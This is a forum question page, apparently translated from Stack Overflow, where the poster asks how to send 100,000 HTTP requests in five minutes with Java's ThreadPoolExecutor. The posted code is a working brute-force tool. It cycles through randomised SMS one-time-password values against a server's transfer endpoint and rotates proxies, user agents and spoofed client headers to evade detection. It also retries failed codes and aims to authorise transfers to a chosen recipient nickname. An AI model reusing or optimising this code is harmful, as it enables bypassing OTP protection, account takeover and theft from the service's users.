使用threadpoolexecutor在5分钟内发出100000个请求

g2ieeal7  于 2021-08-25  发布在  Java
关注(0)|答案(0)|浏览(367)

你认为有可能吗?我使用java.util.concurrent和java.net httpurlconnection对池中的每个线程发出请求。但a遇到了一个问题:
有些连接没有结束,并且它保持了该线程很长一段时间。我看到池没有终止,因为一些线程从未实现。
这需要大量的互联网性能,当互联网速度变慢时,几乎所有的请求都会遇到连接超时或读取超时异常。您有更好的解决方案吗。我尝试了不同步的lib,比如java reactive webflux、io.vertx.webclient,但没有更好。
以下是我的部分代码:

public static void cancelMobile(User user, int split, int start, int end, String nickNameRecv, boolean useProxy, int timeout) {
        long startTime = System.currentTimeMillis();
        makeRandomOTPQueue(start, end);
        int size = 50000;//randomOTP.size();
        System.out.println("LUONG: " + split + " TOTAL: " + size);
        ArrayBlockingQueue<Runnable> workQueue = new ArrayBlockingQueue<>(size);
        RejectedExecutionHandler handler = new ThreadPoolExecutor.DiscardOldestPolicy();
        ThreadPoolExecutor threadPoolExecutor = /*(ThreadPoolExecutor) Executors.newCachedThreadPool();*/
                new ThreadPoolExecutor(split,
                        1000, Long.MAX_VALUE, TimeUnit.NANOSECONDS, workQueue, handler);
        ScheduledExecutorService scheduledThreadPoolExecutor = Executors.newScheduledThreadPool(split);
        threadPoolExecutor.allowCoreThreadTimeOut(false);
        List<TransferSMSOTP> transferSMSOTPList = new LinkedList<>();
        for (int j = 0; j < size; j++) {
            threadPoolExecutor.submit(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
                    useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
//            scheduledThreadPoolExecutor.schedule(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
//                    useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout),1000, TimeUnit.MILLISECONDS);
        }
        threadPoolExecutor.shutdown();
        while (!threadPoolExecutor.isTerminated()) {
        }
        ThreadPoolExecutor poolFail = new ThreadPoolExecutor(split,
                randomOTP.size(), 1, TimeUnit.MILLISECONDS, workQueue, handler);
        System.out.println("RETRY amount: " + failList.size());
        LinkedList<Integer> clone = failList;
        System.out.println("waiting pop fail otp");
        long backup = System.currentTimeMillis();
        for (int i = 0; i < clone.size(); i++) {
            try {
                poolFail.execute(new TransferSMSOTP(user, String.valueOf(clone.remove()),
                        useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
            } catch (Exception e) {
                System.out.println("cannot pop: " + e.getMessage());
            }
//            if (System.currentTimeMillis() - backup > TimeUnit.MINUTES.toMillis(2)) {
//                System.out.println("Exit pop");
//                poolFail.shutdownNow();
//            }
        }
        poolFail.shutdown();
        System.out.println("waiting handle failed otp");
        while (!poolFail.isTerminated()) {
            if (System.currentTimeMillis() - startTime > TimeUnit.MINUTES.toMillis(5)) {
                System.out.println("Exit fail handle");
                poolFail.shutdownNow();
//                System.exit(0);
                break;
            }
        }
        System.out.println("UNHANDLED amount: " + failList.size() + ", total time of job: " + (System.currentTimeMillis() - startTime));
    }

在我的runnable类中:

public void run() {
        try {
            String url = this.user.getServer().getUrlTransfer();
            Document data = new Document();
            data.put("nickNameRecv", this.nickNameRecv);
            data.put("otp", otp);
            String authorization = "Bearer " +
                    this.user.getAuth();
            URL urlCon = new URL(url);
            HttpURLConnection connection;
            final String authUser = this._proxy.getProxyUserName();
            final String authPassword = this._proxy.getProxyPassword();
            Authenticator.setDefault(new ProxyAuthenticator(authUser, authPassword));
            Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(this._proxy.getProxyHost(), this._proxy.getProxyPort()));
            if (_proxy == null)
                connection = (HttpURLConnection) urlCon.openConnection();
            else
                connection = (HttpURLConnection) urlCon.openConnection(proxy);
            connection.setRequestMethod("POST");
            connection.setConnectTimeout(timeout);
            connection.setReadTimeout(timeout);
            connection.setRequestProperty(HttpHeaders.ACCEPT, ContentType.APPLICATION_JSON.toString());
            connection.setRequestProperty(HttpHeaders.CONTENT_TYPE, ContentType.APPLICATION_JSON.toString());
            connection.setRequestProperty(HttpHeaders.AUTHORIZATION, authorization);connection.setRequestProperty("client-browser", "Chrome 83");
//                connection.setRequestProperty("client-deviceid", rand(32, -1, "abcdef1234567890"));
            connection.setRequestProperty("client-operatingsystem", "Windows");
            String param = data.toJson();
            connection.setRequestProperty("Content-Length", String.valueOf(param.length()));
            connection.setRequestProperty(HttpHeaders.USER_AGENT, Main.agent.get(new Random().nextInt(Main.agent.size())));
            connection.setDoOutput(true);
            OutputStream outputStream = connection.getOutputStream();
            outputStream.write(param.getBytes());

            InputStream inputStream = connection.getInputStream();

            ObjectMapper mapper = new ObjectMapper();
            Map res = mapper.readValue(inputStream, Map.class);

            outputStream.close();
            inputStream.close();
            connection.disconnect();
            ProcessGame.done++;
            Main.f.updateResult();
        } catch (Exception e) {
            ProcessGame.failList.add(Integer.parseInt(this.otp));
        }
    }

我得到的最好结果是大约20000/99999请求获得http状态200。它有更好的解决方案吗?

暂无答案!

目前还没有任何答案,快来回答吧!

相关问题